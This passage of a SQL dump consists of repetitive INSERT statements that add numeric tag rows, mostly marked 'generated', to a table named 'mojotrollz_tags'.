(14445, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14446, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14446, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14447, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14447, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14448, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14448, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14449, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14449, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14450, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14451, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14452, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14454, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14455, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14456, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14456, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14456, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14457, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14457, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14458, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14459, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14459, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14460, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14461, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14462, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14463, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14463, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14464, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14467, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14467, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14469, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14469, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14470, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14470, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14471, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14471, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14472, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14472, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14473, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14473, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14474, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14474, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14475, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14475, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14476, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14476, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14477, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14477, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14478, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14478, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14479, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14479, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14480, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14483, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14487, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14487, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14488, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14488, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14490, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14490, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14491, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14491, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14492, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14492, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14494, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14494, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14496, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14496, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14497, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14502, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14503, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14506, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14507, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14507, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14507, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14509, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14509, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14509, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14510, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14510, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14510, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14511, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14512, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14513, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14515, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14516, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14517, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14517, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14517, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14518, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14519, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14521, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14522, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14522, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14523, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14524, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14525, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14526, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14527, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14527, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14528, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14528, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14529, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14529, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14530, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14531, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14531, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14532, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14532, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14532, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14533, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14534, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14535, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14536, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14536, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14538, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14541, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14542, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14543, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14543, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14544, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14544, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14545, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14545, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14546, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14549, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14550, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14552, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14555, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14556, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14560, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14567, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14601, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14601, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14601, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14602, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14602, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14605, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 